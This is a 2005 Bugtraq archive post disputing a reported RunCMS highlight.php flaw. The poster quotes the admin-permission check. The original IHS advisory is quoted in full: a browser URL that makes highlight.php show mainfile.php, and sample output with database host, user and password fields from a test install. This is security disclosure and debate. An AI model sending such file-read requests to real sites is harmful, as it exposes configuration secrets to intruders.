Bugtraq mailing list archives
runcms highlight.php hole
From: Security Lists <secure () kkeonline com>
Date: Thu, 18 Aug 2005 10:37:02 +0700
This is a stupid BUG report.They found the bug without checking the script or they know but dont said about it to promote their group.
The truth is the script is allow only user that have the right to access the "systems" module to use it, this mean only admin and some moderators/users that have the right to access "systems" module can use this script. Normal users and unregistered user can not use this script, does this should call BUG ? It's mean he found this bug when he logged in as admin, once he is logged out he will never success again until.
What's does this code mean??? if ($xoopsUser) { $xoopsModule = XoopsModule::getByDirname('system'); if ( !$xoopsUser->isAdmin($xoopsModule->mid()) ) { redirect_header(XOOPS_URL.'/', 3, _NOPERM); exit(); } } else { redirect_header(XOOPS_URL.'/', 3, _NOPERM); exit(); } ---------------------- ******************************************** IHS Iran Hackers Sabotage Public advisory by : NT NT () ihsteam com ******************************************** If You Have RUNCMS Installation Address You Can Use highligh.php Hole And Get DataBase Configuration(Name,User,Password) Tested In RUNCMS 1.1A ------------------------------------------- Input This Line To Your Browser AddressBar : http://targetsite/runcmsinstalation/class/debug/highlight.php? file=runcmsinstallationpath\mainfile.php&line=151#151 Like This : http://localhost/runcms/class/debug/highlight.php? file=c:\phpdev\www\runcms\mainfile.php&line=151#151 You See This Result : 1 <?php 2 // ------------------------------------------------------------------- ------ // 3 // E-Xoops: Content Management for the Masses // 4 // < http://www.e-xoops.com
//
5 // ------------------------------------------------------------------- ------ // 6 7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) { 8 define('XOOPS_MAINFILE_INCLUDED', 1); 9 10 // Physical Path 11 // Physical path to your main RUNCMS directory WITHOUT trailing slash. ( On windows use simple forward slashes & be sure to include the drive letter. c:/myfolder ) 12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1'); 13 14 // Virtual Path (URL) 15 // Virtual path to your main RUNCMS directory WITHOUT trailing slash. ( http://www.mysite.com/myfolder ) 16 define('XOOPS_URL', 'http://localhost/runcms1.1'); 17 18 // Database 19 // Choose the type of database to be used. 20 $xoopsConfig['database'] = 'mysql'; 21 22 // Table Prefix 23 // This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'runcms'. 24 $xoopsConfig['prefix'] = 'runcms'; 25 26 // Database Hostname 27 // Hostname of the database server. ( If you are unsure, 'localhost' works in most cases. ) 28 $xoopsConfig['dbhost'] = 'localhost'; 29 30 // Database Username 31 // Your database user account on the host. ( Often root when installed on your local machine. ) 32 $xoopsConfig['dbuname'] = 'root'; 33 34 // Database Password 35 // Password for your database user account. 36 $xoopsConfig['dbpass'] = ''; 37 38 // Database Name 39 // The name of database on the host. The installer will attempt to create the database if not exist. 40 $xoopsConfig['dbname'] = 'aaa'; 41 42 // Use persistent connection? (Yes=1 No=0) 43 // Default is 'No'. Choose 'No' if you are unsure. 44 $xoopsConfig['db_pconnect'] = 0; 45 46 // Default setup language. 47 $xoopsConfig['default_language'] = 'english'; 48 49 include_once(XOOPS_ROOT_PATH.'/include/common.php'); 50 } ?> ------------------------------------------ More Information See: http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12 Source Advisory : http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14 Found By NT(IHS) NT () IHSTeam com Greet To Lord And C0d3r From IHS. www.IHSTeam.com -- www.IHSTEAM.com www.IHSSECURITY.com
Current thread:
- runcms highlight.php hole Security Lists (Aug 18)